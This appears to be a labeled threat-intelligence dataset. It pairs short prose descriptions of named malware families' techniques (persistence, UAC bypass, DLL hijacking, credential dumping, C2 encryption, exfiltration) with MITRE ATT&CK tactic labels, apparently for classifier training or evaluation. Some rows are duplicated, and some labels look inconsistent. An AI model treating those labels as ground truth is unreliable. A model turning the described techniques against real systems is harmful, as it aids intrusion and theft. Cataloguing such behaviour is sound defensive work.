"FakeM C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers. Additionally, some variants of FakeM use modified SSL code for communications back to C2 servers, making SSL decryption ineffective.",['TA0011:Command and Control']
The original variant of FakeM encrypts C2 traffic using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation. Some variants of FakeM use RC4 to encrypt C2 traffic.,['TA0011:Command and Control']
FatDuke has been packed with junk code and strings.,['TA0005:Defense Evasion']
FatDuke can copy files and directories from a compromised host.,['TA0009:Collection']
FatDuke can decrypt AES encrypted C2 communications.,['TA0005:Defense Evasion']
FatDuke has used several C2 servers per targeted organization.,['TA0011:Command and Control']
FatDuke can secure delete its DLL.,['TA0005:Defense Evasion']
FatDuke can enumerate directories on target machines.,['TA0007:Discovery']
FatDuke can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.,['TA0011:Command and Control']
FatDuke has attempted to mimic a compromised user's traffic by using the same user agent as the installed browser.,['TA0005:Defense Evasion']
FatDuke can call ShellExecuteW to open the default browser on the URL localhost.,['TA0002:Execution']
"FatDuke can use base64 encoding, string stacking, and opaque predicates for obfuscation.",['TA0005:Defense Evasion']
FatDuke has the ability to execute PowerShell scripts.,['TA0002:Execution']
FatDuke can list running processes on the localhost.,['TA0007:Discovery']
FatDuke can get user agent strings for the default browser from HKCU\Software\Classes\http\shell\open\command.,['TA0007:Discovery']
FatDuke has used HKLM\SOFTWARE\Microsoft\CurrentVersion\Run to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FatDuke can execute via rundll32.,['TA0005:Defense Evasion']
FatDuke has been regularly repacked by its operators to create large binaries and evade detection.,['TA0005:Defense Evasion']
FatDuke can AES encrypt C2 communications.,['TA0011:Command and Control']
"FatDuke can collect the user name, Windows version, computer name, and available space on discs from a compromised host.",['TA0007:Discovery']
FatDuke can identify the MAC address on the target computer.,['TA0007:Discovery']
FatDuke can turn itself on or off at random intervals.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
FatDuke can be controlled via a custom C2 protocol over HTTP.,['TA0011:Command and Control']
Felismus can download files from remote servers.,['TA0011:Command and Control']
Felismus has masqueraded as legitimate Adobe Content Management System files.,['TA0005:Defense Evasion']
Felismus checks for processes associated with anti-virus vendors.,['TA0007:Discovery']
Some Felismus samples use a custom method for C2 traffic that utilizes Base64.,['TA0011:Command and Control']
Some Felismus samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.,['TA0011:Command and Control']
"Felismus collects the system information, including hostname and OS version, and sends it to the C2 server.",['TA0007:Discovery']
Felismus collects the victim LAN IP address and sends it to the C2 server.,['TA0007:Discovery']
Felismus collects the current username and sends it to the C2 server.,['TA0007:Discovery']
Felismus uses HTTP for C2.,['TA0011:Command and Control']
Felismus uses command line for execution.,['TA0002:Execution']
Ferocious can use COM hijacking to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ferocious can delete files from a compromised host.,['TA0005:Defense Evasion']
Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.,['TA0005:Defense Evasion']
Ferocious can run GET.WORKSPACE in Microsoft Excel to check if a mouse is present.,['TA0007:Discovery']
Ferocious can use PowerShell scripts for execution.,['TA0002:Execution']
Ferocious has checked for AV software as part of its persistence process.,['TA0007:Discovery']
"Ferocious can run anti-sandbox checks using the Microsoft Excel 4.0 function GET.WORKSPACE to determine the OS version, if there is a mouse present, and if the host is capable of playing sounds.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Ferocious can use GET.WORKSPACE in Microsoft Excel to determine the OS version of the compromised host.,['TA0007:Discovery']
Ferocious has the ability to use Visual Basic scripts for execution.,['TA0002:Execution']
Fgdump can dump Windows password hashes.,['TA0006:Credential Access']
FinFisher contains junk code in its functions in an effort to confuse disassembly programs.,['TA0005:Defense Evasion']
Some FinFisher variants incorporate an MBR rootkit.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
FinFisher performs UAC bypass.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
FinFisher clears the system event logs using OpenEventLog/ClearEventLog APIs .,['TA0005:Defense Evasion']
FinFisher hooks processes by modifying IAT pointers to CreateWindowEx.,"['TA0009:Collection', 'TA0006:Credential Access']"
A FinFisher variant uses DLL search order hijacking.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FinFisher uses DLL side-loading to load malicious programs.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"FinFisher extracts and decrypts stage 3 malware, which is stored in encrypted resources.",['TA0005:Defense Evasion']
FinFisher injects itself into various processes depending on whether it is low integrity or high integrity.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
FinFisher enumerates directories and scans for certain files.,['TA0007:Discovery']
FinFisher has used the KernelCallbackTable to hijack the execution flow of a process by replacing the __fnDWORD function with the address of a created Asynchronous Procedure Call stub routine.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FinFisher renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.,['TA0005:Defense Evasion']
"FinFisher is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.",['TA0005:Defense Evasion']
FinFisher checks its parent process for indications that it is running in a sandbox setup.,['TA0007:Discovery']
FinFisher queries Registry values as part of its anti-sandbox checks.,['TA0007:Discovery']
FinFisher establishes persistence by creating the Registry key HKCU\Software\Microsoft\Windows\Run.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FinFisher takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.,['TA0009:Collection']
FinFisher probes the system to check for antimalware processes.,['TA0007:Discovery']
A FinFisher variant uses a custom packer.,['TA0005:Defense Evasion']
FinFisher obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
FinFisher checks if the victim OS is 32 or 64-bit.,['TA0007:Discovery']
FinFisher uses token manipulation with NtFilterToken as part of UAC bypass.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
FinFisher creates a new Windows service with the malicious executable for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Final1stspy uses Python code to deobfuscate base64-encoded strings.,['TA0005:Defense Evasion']
Final1stspy obfuscates strings with base64 encoding.,['TA0005:Defense Evasion']
Final1stspy obtains a list of running processes.,['TA0007:Discovery']
Final1stspy creates a Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Final1stspy obtains victim Microsoft Windows version information and CPU architecture.,['TA0007:Discovery']
Final1stspy uses HTTP for C2.,['TA0011:Command and Control']
Flagpro can check the name of the window displayed on the system.,['TA0007:Discovery']
"Flagpro can collect data from a compromised host, including Windows authentication information.",['TA0009:Collection']
Flagpro has exfiltrated data to the C2 server.,['TA0010:Exfiltration']
Flagpro can close specific Windows Security and Internet Explorer dialog boxes to mask external connections.,['TA0005:Defense Evasion']
Flagpro can download additional malware from the C2 server.,['TA0011:Command and Control']
Flagpro has been used to execute the net localgroup administrators command on a targeted system.,['TA0007:Discovery']
Flagpro has relied on users clicking a malicious attachment delivered through spearphishing.,['TA0002:Execution']
Flagpro can download malicious files with a .tmp extension and append them with .exe prior to execution.,['TA0005:Defense Evasion']
Flagpro can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`.,['TA0002:Execution']
Flagpro has been used to execute `net view` to discover mapped network shares.,['TA0007:Discovery']
Flagpro has been delivered within ZIP or RAR password-protected archived files.,['TA0005:Defense Evasion']
Flagpro has been used to run the tasklist command on a compromised system.,['TA0007:Discovery']
Flagpro has dropped an executable file to the startup directory.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Flagpro has been used to execute net view on a targeted system.,['TA0007:Discovery']
Flagpro has the ability to wait for a specified time interval between communicating with and executing commands from C2.,['TA0010:Exfiltration']
Flagpro has been distributed via spearphishing as an email attachment.,['TA0001:Initial Access']
Flagpro has encoded bidirectional data communications between a target system and C2 server using Base64.,['TA0011:Command and Control']
"Flagpro can check whether the target system is using Japanese, Taiwanese, or English through detection of specific Windows Security and Internet Explorer dialog.",['TA0007:Discovery']
Flagpro has been used to execute the ipconfig /all command on a victim system.,['TA0007:Discovery']
Flagpro has been used to execute netstat -ano on a compromised host.,['TA0007:Discovery']
Flagpro has been used to run the whoami command on the system.,['TA0007:Discovery']
Flagpro can execute malicious VBA macros embedded in .xlsm files.,['TA0002:Execution']
Flagpro can communicate with its C2 using HTTP.,['TA0011:Command and Control']
Flagpro can use `cmd.exe` to execute commands received from C2.,['TA0002:Execution']
Flame can record audio using any existing hardware recording devices.,['TA0009:Collection']
Flame can use Windows Authentication Packages for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Flame has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.",['TA0010:Exfiltration']
Flame can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.,['TA0008:Lateral Movement']
Flame can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available.,['TA0003:Persistence']
Flame can create backdoor accounts with login `HelpAssistant` on domain connected systems if appropriate rights are available.,['TA0005:Defense Evasion']
Flame contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
Rundll32.exe is used as a way of executing Flame at the command-line.,['TA0005:Defense Evasion']
Flame can take regular screenshots when certain applications are open that are sent to the command and control server.,['TA0009:Collection']
Flame identifies security software such as antivirus through the Security module.,['TA0007:Discovery']
FlawedAmmyy can collect clipboard data.,['TA0009:Collection']
FlawedAmmyy may obfuscate portions of the initial C2 handshake.,['TA0011:Command and Control']
FlawedAmmyy has collected information and files from a compromised machine.,['TA0009:Collection']
FlawedAmmyy has sent data collected from a compromised host to its C2 servers.,['TA0010:Exfiltration']
FlawedAmmyy can execute batch scripts to delete files.,['TA0005:Defense Evasion']
FlawedAmmyy can transfer files from C2.,['TA0011:Command and Control']
FlawedAmmyy can collect mouse events.,"['TA0009:Collection', 'TA0006:Credential Access']"
FlawedAmmyy can collect keyboard events.,"['TA0009:Collection', 'TA0006:Credential Access']"
FlawedAmmyy enumerates the privilege level of the victim during the initial infection.,['TA0007:Discovery']
FlawedAmmyy has been installed via `msiexec.exe`.,['TA0005:Defense Evasion']
FlawedAmmyy will attempt to detect if a usable smart card is current inserted into a card reader.,['TA0007:Discovery']
FlawedAmmyy has used PowerShell to execute commands.,['TA0002:Execution']
FlawedAmmyy has established persistence via the `HKCU\SOFTWARE\microsoft\windows\currentversion\run` registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FlawedAmmyy has used `rundll32` for execution.,['TA0005:Defense Evasion']
FlawedAmmyy can capture screenshots.,['TA0009:Collection']
FlawedAmmyy will attempt to detect anti-virus products during the initial infection.,['TA0007:Discovery']
FlawedAmmyy has used SEAL encryption during the initial C2 handshake.,['TA0011:Command and Control']
FlawedAmmyy can collect the victim's operating system and computer name during the initial infection.,['TA0007:Discovery']
FlawedAmmyy enumerates the current user during the initial infection.,['TA0007:Discovery']
FlawedAmmyy has used HTTP for C2.,['TA0011:Command and Control']
FlawedAmmyy has used `cmd` to execute commands on a compromised host.,['TA0002:Execution']
FlawedAmmyy leverages WMI to enumerate anti-virus on the victim.,['TA0002:Execution']
FlawedGrace encrypts its C2 configuration files with AES in CBC mode.,['TA0005:Defense Evasion']
"FoggyWeb can use a dynamic XOR key and a custom XOR methodology to encode data before exfiltration. Also, FoggyWeb can encode C2 command output within a legitimate WebP file.",['TA0009:Collection']
FoggyWeb can invoke the `Common.Compress` method to compress data with the C# GZipStream compression class.,['TA0009:Collection']
FoggyWeb can compile and execute source code sent to the compromised AD FS server via a specific HTTP POST.,['TA0005:Defense Evasion']
FoggyWeb's loader has used DLL Search Order Hijacking to load malicious code instead of the legitimate `version.dll` during the `Microsoft.IdentityServer.ServiceHost.exe` execution process.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FoggyWeb can retrieve configuration data from a compromised AD FS server.,['TA0009:Collection']
FoggyWeb can be decrypted in memory using a Lightweight Encryption Algorithm -128 key and decoded using a XOR key.,['TA0005:Defense Evasion']
FoggyWeb has been XOR-encoded.,['TA0005:Defense Evasion']
FoggyWeb can remotely exfiltrate sensitive information from a compromised AD FS server.,['TA0010:Exfiltration']
FoggyWeb's loader can check for the FoggyWeb backdoor .pri file on a compromised AD FS server.,['TA0007:Discovery']
FoggyWeb can receive additional malicious components from an actor controlled C2 server and execute them on a compromised AD FS server.,['TA0011:Command and Control']
"FoggyWeb can masquerade the output of C2 commands as a fake, but legitimately formatted WebP file.",['TA0005:Defense Evasion']
"FoggyWeb can be disguised as a Visual Studio file such as `Windows.Data.TimeZones.zh-PH.pri` to evade detection. Also, FoggyWeb's loader can mimic a genuine `dll` file that carries out the same import functions as the legitimate Windows `version.dll` file.",['TA0005:Defense Evasion']
FoggyWeb's loader can use API functions to load the FoggyWeb backdoor into the same Application Domain within which the legitimate AD FS managed code is executed.,['TA0002:Execution']
FoggyWeb can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.,"['TA0006:Credential Access', 'TA0007:Discovery']"
FoggyWeb can retrieve token signing certificates and token decryption certificates from a compromised AD FS server.,['TA0006:Credential Access']
FoggyWeb's loader can enumerate all Common Language Runtimes and running Application Domains in the compromised AD FS server's Microsoft.IdentityServer.ServiceHost.exe process.,['TA0007:Discovery']
FoggyWeb's loader has reflectively loaded .NET-based assembly/payloads into memory.,['TA0005:Defense Evasion']
FoggyWeb's loader can call the load function to load the FoggyWeb dll into an Application Domain on a compromised AD FS server.,['TA0002:Execution']
FoggyWeb has used a dynamic XOR key and custom XOR methodology for C2 communications.,['TA0011:Command and Control']
FoggyWeb can allow abuse of a compromised AD FS server's SAML token.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
FoggyWeb has the ability to communicate with C2 servers over HTTP GET/POST requests.,['TA0011:Command and Control']
Forfiles can be used to act on files/directories in a system during .,['TA0009:Collection']
Forfiles can be used to locate certain types of files/directories in a system.,['TA0007:Discovery']
Forfiles can be used to subvert controls and possibly conceal command execution by not directly invoking cmd.,['TA0005:Defense Evasion']
FrameworkPOS can XOR credit card information before exfiltration.,['TA0009:Collection']
FrameworkPOS can collect elements related to credit card data from process memory.,['TA0009:Collection']
FrameworkPOS can use DNS tunneling for exfiltration of credit card data.,['TA0010:Exfiltration']
FrameworkPOS can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\Windows\.,['TA0009:Collection']
FrameworkPOS can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.,['TA0007:Discovery']
FruitFly executes and stores obfuscated Perl scripts.,['TA0005:Defense Evasion']
FruitFly will delete files on the system.,['TA0005:Defense Evasion']
FruitFly looks for specific files and file types.,['TA0007:Discovery']
"FruitFly saves itself with a leading ""."" to make it a hidden file.",['TA0005:Defense Evasion']
FruitFly persists via a Launch Agent.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FruitFly has the ability to list processes on the system.,['TA0007:Discovery']
FruitFly takes screenshots of the user's desktop.,['TA0009:Collection']
FunnyDream has the ability to discover application windows via execution of `EnumWindows`.,['TA0007:Discovery']
FunnyDream has compressed collected files with zLib and encrypted them using an XOR operation with the string key from the command line or `qwerasdf` if the command line argument doesn’t contain the key. File names are obfuscated using XOR with the same key as the compressed file content.,['TA0009:Collection']
FunnyDream has compressed collected files with zLib.,['TA0009:Collection']
FunnyDream can monitor files for changes and automatically collect them.,['TA0009:Collection']
FunnyDream can use com objects identified with `CLSID_ShellLink` and `WScript.Shell` to enable persistence mechanisms.,['TA0002:Execution']
FunnyDream can send compressed and obfuscated packets to C2.,['TA0011:Command and Control']
FunnyDream can upload files from victims' machines.,['TA0009:Collection']
The FunnyDream FilePakMonitor component has the ability to collect files from removable devices.,['TA0009:Collection']
"The FunnyDream FilepakMonitor component can inject into the Bka.exe process using the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` APIs to load the DLL component.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
FunnyDream can Base64 encode its C2 address stored in a template binary with the `xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_-` or `xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_=` character sets.,['TA0005:Defense Evasion']
"FunnyDream can execute commands, including gathering user information, and send the results to C2.",['TA0010:Exfiltration']
FunnyDream can delete files including its dropper component.,['TA0005:Defense Evasion']
"FunnyDream can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection.",['TA0007:Discovery']
FunnyDream has the ability to clean traces of malware deployment.,['TA0005:Defense Evasion']
FunnyDream can download additional files onto a compromised host.,['TA0011:Command and Control']
The FunnyDream Keyrecord component can capture keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
FunnyDream can stage collected information including screen captures and logged keystrokes locally.,['TA0009:Collection']
FunnyDream has used a service named `WSearch` for execution.,['TA0005:Defense Evasion']
"FunnyDream can use Native API for defense evasion, discovery, and collection.",['TA0002:Execution']
FunnyDream can communicate with C2 over TCP and UDP.,['TA0011:Command and Control']
The FunnyDream FilepakMonitor component can detect removable drive insertion.,['TA0007:Discovery']
"FunnyDream has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`.",['TA0007:Discovery']
FunnyDream can connect to HTTP proxies via TCP to create a tunnel to C2.,['TA0011:Command and Control']
FunnyDream can identify and use configured proxies in a compromised network for C2 communication.,['TA0011:Command and Control']
FunnyDream can check `Software\Microsoft\Windows\CurrentVersion\Internet Settings` to extract the `ProxyServer` string.,['TA0007:Discovery']
FunnyDream can use a Registry Run Key and the Startup folder to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FunnyDream can collect information about hosts on the victim network.,['TA0007:Discovery']
FunnyDream can use `rundll32` for execution of its components.,['TA0005:Defense Evasion']
The FunnyDream ScreenCap component can take screenshots on a compromised host.,['TA0009:Collection']
FunnyDream can identify the processes for Bkav antivirus.,['TA0007:Discovery']
FunnyDream can enumerate all logical drives on a targeted machine.,['TA0007:Discovery']
FunnyDream can parse the `ProxyServer` string in the Registry to discover http proxies.,['TA0007:Discovery']
FunnyDream has the ability to gather user information from the targeted system using `whoami/upn&whoami/fqdn&whoami/logonid&whoami/all`.,['TA0007:Discovery']
FunnyDream can check system time to help determine when changes were made to specified files.,['TA0007:Discovery']
FunnyDream can use `cmd.exe` for execution on remote hosts.,['TA0002:Execution']
FunnyDream can use WMI to open a Windows command shell on a remote machine.,['TA0002:Execution']
FunnyDream has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Fysbis has been encrypted using XOR and RC4.,['TA0005:Defense Evasion']
Fysbis has the ability to delete files.,['TA0005:Defense Evasion']
Fysbis has the ability to search for files.,['TA0007:Discovery']
Fysbis can perform keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
Fysbis has masqueraded as the rsyncd and dbus-inotifier services.,['TA0005:Defense Evasion']
Fysbis has masqueraded as trusted software rsyncd and dbus-inotifier.,['TA0005:Defense Evasion']
Fysbis can collect information about running processes.,['TA0007:Discovery']
Fysbis can use Base64 to encode its C2 traffic.,['TA0011:Command and Control']
"Fysbis has used the command ls /etc | egrep -e""fedora\*|debian\*|gentoo\*|mandriva\*|mandrake\*|meego\*|redhat\*|lsb-\*|sun-\*|SUSE\*|release"" to determine which Linux OS version is running.",['TA0007:Discovery']
Fysbis has established persistence using a systemd service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Fysbis has the ability to create and execute commands in a remote shell for CLI.,['TA0002:Execution']
"If executing without root privileges, Fysbis adds a `.desktop` configuration file to the user's `~/.config/autostart` directory.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
GLASSTOKEN has the ability to decode hexadecimal and Base64 C2 requests.,['TA0005:Defense Evasion']
GLASSTOKEN can use PowerShell for command execution.,['TA0002:Execution']
GLASSTOKEN has hexadecimal and Base64 encoded C2 content.,['TA0011:Command and Control']
GLASSTOKEN is a web shell capable of tunneling C2 connections and code execution on compromised Ivanti Secure Connect VPNs.,['TA0003:Persistence']
GLOOXMAIL communicates to servers operated by Google using the Jabber/XMPP protocol.,['TA0011:Command and Control']
GLOOXMAIL communicates to servers operated by Google using the Jabber/XMPP protocol for C2.,['TA0011:Command and Control']
GRIFFON has used a reconnaissance module that can be used to retrieve Windows domain membership information.,['TA0007:Discovery']
GRIFFON is written in and executed as JavaScript.,['TA0002:Execution']
GRIFFON has used PowerShell to execute the Meterpreter downloader TinyMet.,['TA0002:Execution']
"GRIFFON has used a persistence module that stores the implant inside the Registry, which executes at logon.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
GRIFFON has used sctasks for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
GRIFFON has used a screenshot module that can be used to take a screenshot of the remote system.,['TA0009:Collection']
"GRIFFON has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation .",['TA0007:Discovery']
GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system.,['TA0007:Discovery']
Gazer uses custom encryption for C2 that uses RSA.,['TA0011:Command and Control']
"Gazer versions are signed with various valid certificates; one was likely faked and issued by Comodo for ""Solid Loop Ltd,"" and another was issued for ""Ultimate Computer Support Ltd.""",['TA0005:Defense Evasion']
Gazer logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.,['TA0005:Defense Evasion']
Gazer has commands to delete files and persistence mechanisms from the victim.,['TA0005:Defense Evasion']
Gazer can execute a task to download a file.,['TA0011:Command and Control']
Gazer creates a mutex using the hard-coded value `{531511FA-190D-5D85-8A4A-279F2F592CC7}` to ensure that only one instance of itself is running.,['TA0005:Defense Evasion']
Gazer stores configuration items in alternate data streams if the Registry is not accessible.,['TA0005:Defense Evasion']
Gazer injects its communication module into an Internet accessible process through which it performs C2.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Gazer can establish persistence by creating a .lnk file in the Start menu.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gazer can establish persistence by creating a scheduled task.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gazer can establish persistence through the system screensaver by configuring it to execute the malware.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gazer can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gazer uses custom encryption for C2 that uses 3DES.,['TA0011:Command and Control']
Gazer obtains the current user's security identifier.,['TA0007:Discovery']
Gazer performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"For early Gazer versions, the compilation timestamp was faked.",['TA0005:Defense Evasion']
Gazer communicates with its C2 servers over HTTP.,['TA0011:Command and Control']
"Gazer can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gelsemium can use token manipulation to bypass UAC on Windows7 systems.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Gelsemium can use junk code to hide functions and evade detection.,['TA0005:Defense Evasion']
Gelsemium can bypass UAC to elevate process privileges on a compromised host.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Gelsemium can use the `IARPUinstallerStringLauncher` COM interface are part of its UAC bypass process.,['TA0002:Execution']
Gelsemium has the ability to use DNS in communication with C2.,['TA0011:Command and Control']
Gelsemium can collect data from a compromised host.,['TA0009:Collection']
Gelsemium can decompress and decrypt DLLs and shellcode.,['TA0005:Defense Evasion']
Gelsemium can use dynamic DNS domain names in C2.,['TA0011:Command and Control']
Gelsemium has the ability to inject DLLs into specific processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Gelsemium has the ability to compress its components.,['TA0005:Defense Evasion']
Gelsemium can use multiple domains and protocols in C2.,['TA0011:Command and Control']
Gelsemium can delete its dropper component from the targeted system.,['TA0005:Defense Evasion']
"Gelsemium can retrieve data from specific Windows directories, as well as open random files as part of Virtualization/Sandbox Evasion.",['TA0007:Discovery']
Gelsemium can store its components in the Registry.,['TA0005:Defense Evasion']
Gelsemium can download additional plug-ins to a compromised host.,['TA0011:Command and Control']
Gelsemium has used unverified signatures on malicious DLLs.,['TA0005:Defense Evasion']
"Gelsemium has named malicious binaries `serv.exe`, `winprint.dll`, and `chrome_elf.dll` and has set its persistence in the Registry with the key value Chrome Update to appear legitimate.",['TA0005:Defense Evasion']
Gelsemium can modify the Registry to store its components.,['TA0005:Defense Evasion']
Gelsemium has the ability to use various Windows API functions to perform tasks.,['TA0002:Execution']
Gelsemium has the ability to use TCP and UDP in C2 communications.,['TA0011:Command and Control']
Gelsemium can drop itself in C:\Windows\System32\spool\prtprocs\x64\winprint.dll to be loaded automatically by the spoolsv Windows service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gelsemium can enumerate running processes.,['TA0007:Discovery']
Gelsemium can open random files and Registry keys to obscure malware behavior from sandbox analysis.,['TA0007:Discovery']
Gelsemium can use custom shellcode to map embedded DLLs into memory.,['TA0005:Defense Evasion']
Gelsemium can set persistence with a Registry run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gelsemium can check for the presence of specific security products.,['TA0007:Discovery']
Gelsemium can determine the operating system and whether a targeted machine has a 32 or 64 bit architecture.,['TA0007:Discovery']
Gelsemium has the ability to distinguish between a standard user and an administrator on a compromised host.,['TA0007:Discovery']
Gelsemium has the ability to perform timestomping of files on targeted systems.,['TA0005:Defense Evasion']
Gelsemium can use junk code to generate random activity to obscure malware behavior.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Gelsemium can use HTTP/S in C2 communications.,['TA0011:Command and Control']
Gelsemium can use a batch script to delete itself.,['TA0002:Execution']
Gelsemium can drop itself in `C:\Windows\System32\spool\prtprocs\x64\winprint.dll` as an alternative Print Processor to be loaded automatically when the spoolsv Windows service starts.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"GeminiDuke collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.",['TA0007:Discovery']
GeminiDuke collects information on local user accounts from the victim.,['TA0007:Discovery']
GeminiDuke collects information on running processes and environment variables from the victim.,['TA0007:Discovery']
GeminiDuke collects information on network settings and Internet proxy settings from the victim.,['TA0007:Discovery']
GeminiDuke collects information on programs and services on the victim that are configured to automatically run at startup.,['TA0007:Discovery']
GeminiDuke uses HTTP and HTTPS for command and control.,['TA0011:Command and Control']
Get2 has the ability to run executables with command-line arguments.,['TA0002:Execution']
Get2 has the ability to inject DLLs into processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Get2 has the ability to identify running processes on an infected host.,['TA0007:Discovery']
Get2 has the ability to identify the computer name and Windows version of an infected host.,['TA0007:Discovery']
Get2 has the ability to identify the current username of an infected host.,['TA0007:Discovery']
Get2 has the ability to use HTTP to send information collected from an infected host to C2.,['TA0011:Command and Control']
Gold Dragon encrypts data using Base64 before being sent to the command and control server.,['TA0009:Collection']
Gold Dragon terminates anti-malware processes if they’re found running on the system.,['TA0005:Defense Evasion']
"Gold Dragon deletes one of its files, 2.hwp, from the endpoint after establishing persistence.",['TA0005:Defense Evasion']
"Gold Dragon lists the directories for Desktop, program files, and the user’s recently accessed files.",['TA0007:Discovery']
Gold Dragon can download additional components from the C2 server.,['TA0011:Command and Control']
Gold Dragon stores information gathered from the endpoint in a file named 1.hwp.,['TA0009:Collection']
Gold Dragon checks the running processes on the victim’s machine.,['TA0007:Discovery']
Gold Dragon enumerates registry keys with the command regkeyenum and obtains information for the Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.,['TA0007:Discovery']
Gold Dragon establishes persistence in the Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gold Dragon checks for anti-malware products and processes.,['TA0007:Discovery']
Gold Dragon collects endpoint information using the systeminfo command.,['TA0007:Discovery']
Gold Dragon collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.,['TA0007:Discovery']
Gold Dragon uses HTTP for communication to the control servers.,['TA0011:Command and Control']
Gold Dragon uses cmd.exe to execute commands for discovery.,['TA0002:Execution']
"GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.",['TA0009:Collection']
GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.,['TA0007:Discovery']
GoldFinder has used HTTP for C2.,['TA0011:Command and Control']
GoldMax has RSA-encrypted its communication with the C2 server.,['TA0011:Command and Control']
The GoldMax Linux variant has used a crontab entry with a @reboot line to gain persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
